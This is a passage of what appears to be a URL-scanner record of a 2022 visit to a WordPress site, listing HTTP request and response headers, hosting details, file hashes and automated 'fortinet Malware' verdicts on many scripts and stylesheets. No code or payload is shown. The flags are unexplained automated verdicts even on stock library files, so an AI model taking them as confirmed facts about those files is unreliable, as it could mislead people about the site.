Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb8-377f-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2528
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2
72.167.59.18200 OK 326 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 17ebffdd326dc716de8f92678a5fcb7e
ff3aa4fe8717109673f9b5edcf6f33cdc11115b8
baed70e7105df41ac74a9ba7e64fc78a08c425002b7eb97e9a4512a63739e536
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "1561727-2db-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 326
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042
72.167.59.18200 OK 920 B URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (2238)
Hash 944486ddd130680c28324ee4c41efd56
fe3af023d7814f6769095c6a44123e9def4ce8ea
801a06dc7b18f26b59ed44d4c5837dc4724a3d940255c4c4673ab9c9443f543f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 24 Mar 2020 10:05:19 GMT
etag: "15811f0-8e2-5a196e39655c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 920
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/wp-embed.min.js?ver=5.4.2
72.167.59.18200 OK 670 B URL HTTP/2 www.comm2po.ca/wp-includes/js/wp-embed.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1399)
Hash b15ce0284a10c68959ced2988f51d25a
887df7f42f5501b5b657f466a2bbd4af246035c8
f5285dc9809343aca063d97a6d02405610cea430801fa9b7feb308e35df5bbc0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/wp-embed.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fde-59a-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 670
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10
72.167.59.18200 OK 8.2 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 4d22d266cebc7dda0a056d247f6ae434
f002084156a96e4c828174ef006ee2ab862daddb
c061fd379791a717cba30182f22e42cc93ebf27afa5a21545ad19264467927c3
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.1.10 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "1560640-ceb3-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 8159
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/animate.css?ver=1.0
72.167.59.18200 OK 4.7 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/animate.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 3d4c3f866483be3762dbb0340bbd0795
e7ace8812ef62280495ac82e60941381efea084f
08de8369f23fd25d70a871e300a737409419b7f7fbd19cd924b6aa78ea52216f
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/animate.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0ead-127cf-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 4657
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
72.167.59.18200 OK 1.7 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (3706)
Hash ce708dba7949c1c6e55ef607e8beec5d
dc8500e044a28c494a9eaf78d8b686664a9dcf0f
1b7bd446288d0ddaeda7126d7f8dff758665fcac36826c627975d7ae9a0354a4
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158127d-f5b-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1663
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/customize-base.min.js?ver=5.4.2
72.167.59.18200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/customize-base.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (7855)
Hash 37f38d058e7c551f74100d04db538059
c3b36405cb47151f6841d26024b95fa23d4f898c
384ee0c06c709b165767b159268edb6aa4c8d38e467439c5418dc2e839e8b5be
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/customize-base.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021f9e-1ed2-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2407
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/customize-preview.min.js?ver=5.4.2
72.167.59.18200 OK 2.9 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/customize-preview.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10745)
Hash 3d685dfd42e7bf19b666e0faee6593c7
36ca314291e0ddf67ed89dd64287e46c4e5ff881
eae41ff1ba8c39d10b4bac02643ffc846e1a42fef2e3cc3fb278178136cc137f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/customize-preview.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fa8-2a1c-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2903
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/style.css?ver=1.0
72.167.59.18200 OK 18 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/style.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f5a6476fd6be45fbc1ddf6483b241836
c9ec74abc50c804cda96a21b3d709d60a20e7937
0cf8e2c8d778a6a260b6e25f05180ac8ddd901ab4c603cea225fa1022b60b390
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/style.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0ebb-1de4c-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 17846
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0
72.167.59.18200 OK 16 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (65366)
Hash be69473425186469837cd5c5f0909d41
3458d155f61aad9d3cd08b7411b3b0fbccc16206
c22d2e34801a2131c4da355c6686c55f384c2f91310f91e1ffb89aea8021ee4a
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/bootstrap.min.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb3-18679-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 15819
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/wp-emoji-release.min.js?ver=5.4.2
72.167.59.18200 OK 4.3 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/wp-emoji-release.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (10942)
Hash 242f4250db8f48967855d353ead37fc7
0bc81d3fc7591482418adc89c63209042238e3d6
7ac607a3bfbf598bbe5602301e93b0480eef9be74cff2821b60263195ac4eed9
GET /wp-includes/js/wp-emoji-release.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Nov 2019 22:04:02 GMT
etag: "1021fe1-364d-596a09c229880-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 4292
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
72.167.59.18200 OK 17 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (64614), with CRLF line terminators
Hash 7f1c6c0af2fc384371ba2034132e0210
e273077f269d6e22dd748444cd584423a7e44f13
3687b5f849fa8fbd531a80c310ef49856ca6c66c3a497cfb89aa617de0a38fa9
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614c1-fdb5-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 17426
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12
72.167.59.18200 OK 5.3 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (19095), with no line terminators
Hash fc72056d5d16101e35afc110cc3f917b
2fc5e9c301cf3a356db2b4835c6700fc8fab4dbd
bd32dc1cad3f202d262e56bfa1a8a9307147fc42692f9237ad84479692a2ecbc
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:33 GMT
etag: "15601ec-4a97-534b5e10cf140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5295
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/underscore.min.js?ver=1.8.3
72.167.59.18200 OK 5.6 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/underscore.min.js?ver=1.8.3
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (16119)
Hash 8cb73032123daada37b37b9770cad749
b9752bdf9feb2d64b6ed19448cf36260ad5b2628
43d3db04689fbd4aaa58183feb79619506636821cb9dcc09036e340bb9ae1c30
GET /wp-includes/js/underscore.min.js?ver=1.8.3 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 26 Oct 2019 00:17:07 GMT
etag: "1021fcc-3f1a-595c52fd2e6c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5623
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/script.js?ver=1
72.167.59.18200 OK 6.7 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/script.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 06bfdc6ccbfbd709b7042b4afd77767a
a04e476d2c28860447dde9e136e66abdbcde9aa5
09b2d2d1cedd46178a5a5baf41b4d157cc23ee02fc29086eeb33badb46c2fc1c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/script.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e2-8a2c-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 6679
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
72.167.59.18200 OK 10 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (36155)
Hash babcd7ae42642f0ff4ba61191c73c7c8
558efb4930c8ca9399977309d058aa74baa3e4e3
ab8ce9d1179e16bfb57dc986c97ab7e7b7c72661c3a1d87d8f9b69a04484a4c0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158127e-8e1c-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 10492
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
72.167.59.18200 OK 33 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (31997)
Hash 4b8dce7b06d15e6a910e80540997665e
f744242089bdfb1426969c85eabb372ddd3c9e82
81c75adb208ca49d416b19972b6e0dd772f07be5fd36a373d453db6c4ceaae46
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 17 May 2019 04:25:54 GMT
etag: "1581270-17a69-5890dc7401880-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 32866
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1
72.167.59.18200 OK 37 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (27287), with CRLF line terminators
Hash 7a66ee54a150742d79464d1739d0f458
40ca5f13c67b9293d6989580ab1183af6a4bf559
a195c3788d26ed741e3f374b5547abe981dbae891094cb995f944387d932e307
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:00 GMT
etag: "15614c2-1afe4-583d3b4e81500-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 36965
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12
72.167.59.18200 OK 40 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (65536), with no line terminators
Hash b46a424e09b596b3fd8b72fe21f43798
c2b63763843d4cdd95beb5cebfd2d9ad7f0e0664
45c679fa19dedffcba3ddeea865b88e3760b1fb40bd26b378131591ff597c457
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:29 GMT
etag: "1560168-6f602-534b5e0cfe840-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 39581
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2015/05/logo.png
72.167.59.18200 OK 3.9 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2015/05/logo.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 122 x 80, 8-bit/color RGBA, non-interlaced\012- data
Hash db25e0058dc266b287f15829ec11add2
14a507f11ea5aa3877f7dbb514fbd739f2969514
6dc9ecaf7b15d9ae8598ca10ce026e20e2dc2dc3aba9cadd8c029d05d31d7619
GET /wp-content/uploads/2015/05/logo.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 20 May 2015 12:44:27 GMT
etag: "15800ac-f21-51682c99380c0"
accept-ranges: bytes
content-length: 3873
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2016/03/logoV2_grayscale.png
72.167.59.18200 OK 4.9 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2016/03/logoV2_grayscale.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 81 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 2a8b0c73ba75d6389d85d342a5c9da9f
5bb1162cadc3a3fd9d64d86676c5bde3414a6298
626e1d5c965260385b0c2a06649e012b8d0bde2f32bab53781badacaa606151f
GET /wp-content/uploads/2016/03/logoV2_grayscale.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 10 Mar 2016 17:26:32 GMT
etag: "15801f8-1348-52db51d922200"
accept-ranges: bytes
content-length: 4936
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9
72.167.59.18200 OK 25 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (511)
Hash 371eb9a7a62a67d14484c79f6cbc5fbd
221f80e355ca9a01bb3a3039df56fe7fd68dc107
2d5e8480d5bb8019cb83ad0922d6e4cc68d1de7bc075ca181bfddd20b6cd6f17
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=1.9.9 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
